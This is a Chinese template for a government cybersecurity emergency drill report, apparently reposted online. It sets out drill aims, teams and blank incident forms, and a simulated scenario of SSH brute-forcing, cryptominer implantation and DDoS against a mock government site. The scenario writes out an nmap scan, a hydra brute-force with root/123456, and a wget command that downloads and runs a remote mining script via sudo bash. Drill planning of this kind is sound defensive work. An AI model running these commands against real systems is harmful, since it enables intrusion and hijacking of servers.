网络安全应急演练总结报告

网络安全应急演练总结报告

编制：

审核：

批准：

20××年×月×日

版本历史

版本

编辑者

编辑内容

日期

评审者

批准人

应急演练方案

1.1应急演练背景

党的十×大以来，以习近平同志为核心的党中央从总体国家安全观出发，对加强国家网络安全工作做出了重要部署。当前我国面临的网络安全形势复杂严峻，网络渗透、网络攻击、有害信息、网络恐怖和犯罪活动正危害和侵蚀着国家政治安全、经济安全、文化安全和社会安全。为贯彻落实《网络安全法》《中央网信办关于印发〈国家网络安全事件应急预案〉的通知》（中网办发文〔20××〕×号）等文件精神，提高网络安全事件应急处置的规范化、程序化、标准化，××市政务信息系统安全监测平台决定开展“××区社会治安综合治理委员会办公室“大联动微治理平台”（以下简称××综治办’大联动微治理平台’）服务器SSH服务被爆破攻击，服务器被植入挖矿木马及恶意程序对电子政务网站中国××（模拟）进行DDoS攻击”应急演练。

1.2应急演练需求分析1.2.1应急演练内容1.2.2应急演练目的

(1)检验预案。通过开展应急演练，查找应急预案中存在的问题，进而完善应急预案，提高应急预案的实用性和可操作性。

(2)完善准备。通过开展应急演练，检查对应突发事件所需应急队伍、物资、装备、技术等方面的准备情况，发现不足及时予以调整补充，做好应急准备工作。

(3)锻炼队伍。通过开展应急演练，增强演练组织单位、参与单位和人员等对应急预案的熟悉程度，提高其应急处置能力。

(4)磨合机制。通过开展应急演练，进一步明确相关单位和人员的职责任务，理顺工作关系，完善应急机制。

(5)科普宣教。通过开展应急演练，普及应急知识，提高业务单位网络安全意识。

1.2.3应急演练方式

实战演练。参演人员针对事先设置的突发事件情景及其后续的发展情景，通过实际决策、行动和操作，完成真实应急响应的过程，从而检验和提高相关人员的临场组织指挥、队伍调动、应急处置技能和后勤保障等应急能力。

1.2.4应急演练环境

需根据不同类型安全事件的危害、不同目标系统的特性提供模拟环境、测试环境、真实环境以供选择，以保证在不影响业务的正常运行的情况下尽可能的模拟安全事件场景。本次预演目的的重点是验证××市网络安全应急预案的流程是否合理、演练流程是否恰当，不是验证技术人员对事件技术处置能力，因此采用模拟环境开展应急演练工作。

1.3应急演练设计

本应急演练方案，参考以下国家相关标准法规进行制定。

◆ 《中华人民共和国突发事件应对法》

◆ 《国家突发公共事件总体应急预案》

◆ 《网络安全法》

◆ 《中央网信办关于印发〈国家网络安全事件应急预案〉的通知》（中网办发文〔20××〕4号）

◆ 《GB/Z 20986-2007 信息安全技术 信息安全事件分类分级指南》

◆ 《GB/T 24363-2009 信息安全技术 信息安全应急响应计划规范》

1.3.1组织架构设计1.3.1.1演练领导小组

职责：负责应急演练活动全过程的组织领导，审批决定演练的重大事项。

总指挥：

副总指挥：

成员：

1.3.1.2业务策划组

职责： 负责调集演练所需物资装备，场地设施（展示大屏、网络、音响等）的保障。

组长：

成员：

1.3.1.3剧本编写组

职责：负责制定应急演练方案，设置场景，设计攻击、监测、通报、处置各环节流程及效果。

组长：

成员：

1.3.1.4技术保障组

职责：负责应急演练个环节包含攻击、监测、处置等环节的具体技术实现。

组长：

成员：

1.3.1.5宣传联络组

职责：负责对外联络相关单位，协调各单位在本次应急演练中的职责。

组长：

成员：

1.3.1.6流程监督监测组

职责：对本次演练的各个环节进行监督，保障整个演练环节的合法合规。

组长：

成员：

1.3.2参演单位设计1.3.3应急演练整体设计

整个应急演练分为6个环节，应急演练前准备、参演人员培训、应急演练启动仪式、正式演练、演练总结、应急演练结束仪式。

1、应急演练前准备：为演练环境准备，系统备份，各项演练内容测试。

2、参演人员培训：根据演练流程培训各参演人员清楚各自的演练内容及演练方法。

3、应急演练启动仪式：领导讲话、演练背景、演练目的介绍。

4、正式演练：各项演练科目。

5、演练总结：由参演人员将各自演练情况进行总结，分析演练预案的实用性和可操作性。应急演练结束仪式：领导讲话，对本次演练进行评价。

1.3.4服务器被植入挖矿木马及对网站进行DDoS攻击应急演练设计（例）1.3.4.1攻击流程与效果设计

word/media/image3.png网络安全演练人员利用安全工具对指定的平台服务器（该服务器提供了常见的网络服务，例如Web服务、终端服务等）进行SSH 暴力破解攻击。攻击流程设计如下：

演练开始后，模拟攻击人员按照既定攻击流程对目标服务器进行攻击，获取到服务器的shell之后，下载植入演练挖矿脚本进行挖矿并获取DDoS攻击脚本对电子政务网站中国××（模拟）进行DDoS攻击，达到爆破指定服务器并植入挖矿木马进行挖矿及对电子政务网站DDoS攻击的设定效果。

攻击效果设计为网络安全演练人员借助工具或手工查找、定位目标××综治办“大联动微治理平台”服务器，扫描服务器（×ד大联动微治理平台”）服务器漏洞，利用目标（××综治办“大联动微治理平台”）服务器SSH服务漏洞控制服务器。植入挖矿木马、DDoS攻击脚本，达到控制服务器并进行挖矿及对电子政务网站进行DDoS的设定攻击效果。

通过分析扫描目标（×× 综治办“大联动微治理平台”）服务器,发现服务器开启SSH22端口、操作系统类型为Linux。

nmap -p 1-65535 -T4 -A -v 192.168.30.131

word/media/image4.png

利用hydra进行SSH爆破获取服务器权限：

word/media/image5.png

网络安全演练人员通过暴力破解得到的(root/123456)进入服务器；

word/media/image6.png

网络安全演练人连接上服务器后，运行脚本获取远端挖矿程序。服务器当前状态：

word/media/image7.png

植入挖矿木马:

1）获取安装脚本

wget --no-check-certificate https://www.yiluzhuanqian.com/soft/script/mservice_2_5.sh -O mservice.sh

2）执行脚本开始挖矿

sudo bash mservice.sh 52036

word/media/image8.jpeg挖矿时服务器状态：

利用该服务器对局域网内部网站进行DDoS攻击。

网站正常运行时状态：

DDoS攻击后网站状态：

word/media/image9.png

1.3.4.2监测流程与效果设计

网络安全演练人员利用监测工具对指定的测试网站系统（该网站提供了常见的网络服务，例如Web服务、终端服务等）进行安全安全事件监测。监测流程设计如下：

1.3.4.4处置流程与效果设计

网络安全演练人员对安全事件进行处置。处置流程设计如下：

word/media/image10_1.png

在处置安全事件的时候，首先断开服务器互联网网络，防止信息继续扩散，然后按照服务器被入侵处置预案对服务器进行安全检查，包含服务器合规性检查、日志检查、应用日志检查、数据库日志检查、后门检查等，待排除服务器安全隐患后重新恢复服务。

合规性检查效果页面：

处置效果设计为以下情况。

word/media/image11.png恢复服务器到正常状态：

恢复网站到正常状态：

撰写安全事件报告：

1.4应急演练详细脚本1.4.1服务器被植入挖矿木马挖矿及对内部网站进行Ddos攻击应急演练详细脚本（例）1.4.1.1模拟攻击脚本1.4.1.2事件监测脚本1.4.1.3定级通报脚本1.4.1.4事件处置脚本

演练结束后，演练人员与业主单位对网站进行恢复，确保网站恢复到演练前的状态。

1.5应急演练配套资源1.5.1演练培训

在演练开始前要进行演练动员和培训，确保所有演练参与人员掌握演练规则、演练情景和各自在演练中的任务。

所有演练参与人员都要经过应急基本知识、演练基本概念、演练现场规则等方面的培训。对控制人员要进行岗位职责、演练过程控制和管理等方面的培训；对评估人员要进行岗位职责、演练评估方法、工具使用等方面的培训；对参演人员要进行应急预案、应急技能及个体防护装备使用等方面的培训。

1.5.2《网络安全事件上报通知书》

网络安全事件上报通知书

报告时间： 年 月 日 时刻

涉事系统

事件发现人

联系电话

涉事网站/系统所属单位

涉事网站/系统地址

所属单位联系人

联系电话

本次事件发生时间

本次事件的简要描述

（可提供文字描述或是事件截图）

本次事件的影响状况

初步判定的事件原因

初步判断事件等级

××市软件产业发展中心签收人

签名及联系电话

1.5.3《重大网络安全事件应急预案确认函》

重大网络安全事件应急预案确认函

提交时间： 年 月 日 时刻

涉事网站/系统所属单位

涉事网站/系统地址

所属单位联系人

联系电话

事件发现人

联系电话

本次事件发生时间

本次事件的简要描述

（可提供文字描述或是事件截图）

本次事件的影响状况

认定所属安全事件等级

依据该事件危害程度、影响范围及事件性质，建议将该事件认定为 等级安全事件。同时建议 需要 不需要 单位介入调查。

签字：

信息安全与基础设施处意见

签字：

盖章：

委领导意见

签字：

盖章：

备注：适用于重大及以上级别安全事件

1.5.4《网络安全事件通报/提醒》1.5.5《安全事件技术报告》

1.5.6《网络安全应急事件处置修复过程记录表》

网络安全应急事件处置修复过程记录表

涉事系统

所属单位

事件发现人

联系电话

涉事网站/系统地址

所属单位联系人

联系电话

本次事件发生时间

事件等级

序号

处置操作描述

处置结果

备注说明

开始时间

结束时间

操作人

联系电话

确认人

联系电话

处置操作描述

处置结果

备注说明

开始时间

结束时间

操作人

联系电话

确认人

联系电话

处置操作描述

处置结果

备注说明

开始时间

结束时间

操作人

联系电话

确认人

联系电话

处置操作描述

处置结果

备注说明

开始时间

结束时间

操作人

联系电话

确认人

联系电话

1.5.7《网络安全应急事件处置修复技术记录表》

网络安全应急事件处置修复技术记录表

涉事系统

所属单位

事件发现人

联系电话

涉事网站/系统地址

所属单位联系人

联系电话

本次事件发生时间

事件等级

序号

处置操作步骤

备注说明

操作时间

操作人

操作人

联系电话

应急演练实施

应急演练签到表应急演练剧本应急演练现场照片

《网络安全应急演练总结报告》相关文档：

网络安全工作计划(精选10篇)09-06

网络安全作文大全09-07

关于网络安全作文（通用10篇）09-07

关于网络安全的作文09-07

的网络安全作文合集4篇09-07

关于网络安全作文四篇09-07

网络安全作文范文10篇09-07

网络安全作文09-07

网络安全作文800字（精选10篇）09-07

网络安全作文范文5篇09-07